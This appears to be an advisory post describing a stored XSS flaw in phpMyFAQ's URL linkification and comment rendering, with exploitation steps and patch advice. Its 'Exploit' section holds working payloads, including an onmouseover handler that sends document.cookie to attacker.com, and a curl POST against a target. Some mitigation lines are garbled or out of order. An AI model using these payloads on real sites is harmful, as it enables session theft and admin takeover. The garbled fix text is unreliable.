Listen to this Post
The vulnerability exists in Utils::parseUrl() at phpmyfaq/src/phpMyFAQ/Utils.php line 281. The function uses regex `/(https?:\/\/[^\s]+)/i` to convert URLs into anchor tags. The character class `[^\s]+` matches double quotes (") and angle brackets (<), and the matched URL is inserted directly into `href=””` without htmlspecialchars(). When `main.enableCommentEditor` is enabled, comment text is sanitized via `sanitizeHtmlComment()` instead of `FILTER_SANITIZE_SPECIAL_CHARS` – the latter would encode `”` but the former does not. This allows a double quote to survive into storage. The stored comment is later rendered via `{{ comment.comment|raw }}` in `comment.macros.twig` line 40, disabling Twig auto-escaping. An attacker submits https://www.evil.com/"onmouseover="alert(document.cookie). The `www.` prefix is required because `parseUrl()` strips https://` then only re-adds it for `www.` URLs, triggering linkification. The double quote closes the `href` attribute early, turning `onmouseover` into a real event handler. Any visitor hovering the link executes JavaScript. The same sink exists in admin panel `admin/content/comments.twig` lines 62 and 112, so admins viewing the panel are also affected. No Content-Security-Policy headers are set, enabling cookie theft and full admin account takeover. The payload persists until manually deleted.
Platform: phpMyFAQ
Version: unknown (affected)
Vulnerability : Stored XSS
Severity: Critical
date: 2026-05-06
<h2 style="color: blue;">Prediction: Patch within 30 days</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Identify vulnerable regex in Utils.php grep -n "preg_replace.https?:\/\/[^\s]+" src/phpMyFAQ/Utils.php Test for missing htmlspecialchars in comment rendering curl -X POST -d "comment=https://evil.com/\"onmouseover=alert(1)" \ -H "Cookie: session=attacker" http://target/faq/submit Scan for unsafe Twig |raw filter usage grep -r "|raw" templates/ --include=".twig"
<h2 style="color: blue;">Exploit:</h2>
1. Register a user account on target phpMyFAQ instance.
2. Ensure `main.enableCommentEditor` is true (default often false but check).
3. Navigate to any FAQ entry with comments enabled.
4. Submit comment: `https://www.example.com/"onmouseover="fetch('//attacker.com/steal?c='+document.cookie)`
5. Wait for admin or other users to hover the link.
6. Alternatively, target admin panel at `/admin/content/comments` where same payload triggers.
<h2 style="color: blue;">Protection from this CVE:</h2>
- Apply patch that replaces `[^\s]+` with a safer URL regex and adds `htmlspecialchars($url, ENT_QUOTES)` before href insertion.
- Disable `main.enableCommentEditor` in admin configuration to force `FILTER_SANITIZE_SPECIAL_CHARS` encoding.
- Set Content-Security-Policy header:script-src ‘self’; object-src ‘none’.htmlspecialchars($match[bash], ENT_QUOTES, ‘UTF-8’)`.
- Upgrade to phpMyFAQ version where the fix is backported (if available).
- Manually edit `Utils.php` line 281: wrap replacement with
Impact:
- Stored cross-site scripting allows any page visitor (including admins) to execute arbitrary JavaScript.
- Admin session cookie theft leads to full account takeover, granting access to configuration, user database, and FAQ content.
- Attacker can deface FAQ pages, redirect users to malicious sites, or perform actions as the admin.
- Persistent until malicious comment is manually deleted; no immediate user interaction required beyond hovering.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
